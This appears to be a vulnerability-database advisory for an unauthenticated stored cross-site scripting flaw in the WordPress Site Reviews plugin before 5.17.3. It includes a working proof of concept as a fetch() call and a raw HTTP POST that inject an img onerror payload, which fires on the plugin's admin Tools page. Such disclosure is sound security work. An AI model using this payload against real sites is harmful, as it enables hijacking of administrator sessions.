Lucene search

K

Site Reviews < 5.17.3 - Unauthenticated Stored Cross-Site Scripting

🗓️ 06 Dec 2021 00:00:00Reported by Krzysztof ZającType 
wpexploit
 wpexploit
👁 168 Views

Unauthenticated Stored Cross-Site Scripting in Site Reviews plugin v5.17.

Show more
Related
Refs
Code
fetch("https://example.com/wp-admin/admin-ajax.php?action=glsr_action", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "body": "site-reviews[0]=</textarea><img+src+onerror=alert(1)>",
  "method": "POST",
  "credentials": "include"
})
  .then(response => response.text())
  .then(data => console.log(data));

POST /wp-admin/admin-ajax.php?action=glsr_action HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 57
Connection: close

site-reviews[0]=</textarea><img+src+onerror=alert(/XSS/)>

The XSS will be triggered when viewing the Tool dashboard of the plugin (/wp-admin/edit.php?post_type=site-review&page=glsr-tools)

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo